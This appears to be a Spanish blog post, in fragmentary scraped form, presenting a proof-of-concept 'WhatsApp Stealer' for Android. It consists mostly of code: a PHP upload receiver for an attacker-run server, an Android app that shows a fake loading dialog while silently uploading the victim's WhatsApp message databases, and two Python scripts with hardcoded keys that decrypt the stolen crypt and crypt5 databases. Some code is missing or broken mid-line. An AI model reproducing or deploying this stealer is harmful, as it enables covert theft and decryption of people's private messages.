Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
en Android (PoC)
Hace unos meses se public en algunos foros una gua paso a paso para
montar nuestro propio Whatsapp Stealer y ahora Bas Bosschert ha
publicado una PoC con unas pocas modificaciones.
Para empezar con la prueba de concepto (y ojo que digo PoC que nos
conocemos ;)) tenemos que publicar en nuestro webserver un php para
subir las bases de datos de Whatsapp:
<?php
// Upload script to upload Whatsapp database
// This script is for testing purposes only.
$uploaddir = "/tmp/whatsapp/";
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br>";
}
else
{
echo "Upload: " . $_FILES["file"]["name"] . "<br>";
echo "Type: " . $_FILES["file"]["type"] . "<br>";
echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo "Stored in: " . $_FILES["file"]["tmp_name"];
...
file_uploads = On
post_max_size = 32M
upload_max_filesize = 32M
<uses-permission
android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-sdk
android:minSdkVersion="8"
android:targetSdkVersion="19" />
<application
android:allowBackup="true"
android:icon="@drawable/ic_launcher"
android:label="@string/app_name"
android:theme="@style/AppTheme" >
<activity
android:name="bb.security.whatsappupload.MainActivity"
android:label="@string/app_name" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER"
/>
</intent-filter>
</activity>
</application>
</manifest>
<RelativeLayout
xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:paddingBottom="@dimen/activity_vertical_margin"
android:paddingLeft="@dimen/activity_horizontal_margin"
android:paddingRight="@dimen/activity_horizontal_margin"
android:paddingTop="@dimen/activity_vertical_margin"
tools:context=".MainActivity" >
<TextView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignParentTop="true"
android:layout_centerHorizontal="true"
android:layout_marginTop="179dp"
android:text="@string/hello_world"
android:textSize="24sp" />
</RelativeLayout>
package bb.security.whatsappupload;
/*
* This application is for testing purposes only.
* Use of this application is at your own risk.
*/
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import android.os.AsyncTask;
import android.os.Bundle;
import android.os.Environment;
import android.app.Activity;
import android.app.ProgressDialog;
import android.util.Log;
import android.view.Menu;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
new UploadWhatsApp().execute();
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
// Inflate the menu; this adds items to the action bar if it is
present.
getMenuInflater().inflate(R.menu.main, menu);
return true;
}
@SuppressWarnings("deprecation")
private void uploadFile(String file) {
HttpURLConnection conn = null;
DataOutputStream dos = null;
DataInputStream inStream = null;
@Override
protected void onPreExecute()
{
//Create a new progress dialog
progressDialog =
ProgressDialog.show(MainActivity.this,"Loading Application, please
wait...",
"Loading, please wait...", false, false);
}
String fileWACrypt =
Environment.getExternalStorageDirectory()
.getPath() + "/WhatsApp/Databases/msgstore.db.crypt";
String fileWAPlain =
Environment.getExternalStorageDirectory()
.getPath() + "/WhatsApp/Databases/msgstore.db";
String fileWAwa = Environment.getExternalStorageDirectory()
.getPath() + "/WhatsApp/Databases/wa.db";
MainActivity.this.uploadFile(fileWACrypt);
MainActivity.this.uploadFile(fileWAPlain);
MainActivity.this.uploadFile(fileWAwa);
return null;
}
}
}
#!/usr/bin/env python
import sys
from Crypto.Cipher import AES
try:
wafile=sys.argv[1]
except:
print "Usage: %s <msgstore.db.crypt>" % __file__
sys.exit(1)
key = "346a23652a46392b4d73257c67317e352e3372482177652c".decode('hex')
cipher = AES.new(key,1)
open('msgstore.db',"wb").write(cipher.decrypt(open(wafile,"rb").read()))
#!/usr/bin/env python
"""
48bits presents:
8===============================================D~~~
WhatsApp msgstore crypt5 decryptor by grbnz0 and nullsub
8===============================================D~~~
"""
import sys
import hashlib
import StringIO
from M2Crypto import EVP
key = bytearray([141, 75, 21, 92, 201, 255, 129, 229, 203, 246, 250, 120,
25, 54, 106, 62, 198, 33, 166, 86, 65, 108, 215, 147])
iv =
bytearray([0x1E,0x39,0xF3,0x69,0xE9,0xD,0xB3,0x3A,0xA7,0x3B,0x44,0x2B,0xB
B,0xB6,0xB0,0xB9])
def decrypt(db,acc):
fh = file(db,'rb')
edb = fh.read()
fh.close()
m = hashlib.md5()
m.update(acc)
md5 = bytearray(m.digest())
for i in xrange(24): key[i] ^= md5[i&0xF]
cipher = EVP.Cipher('aes_192_cbc', key=key, iv=iv, op=0)
sys.stdout.write(cipher.update(edb))
sys.stdout.write(cipher.final())
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'usage %s > decrypted.db' % sys.argv[0]
else:
decrypt(sys.argv[1],sys.argv[2])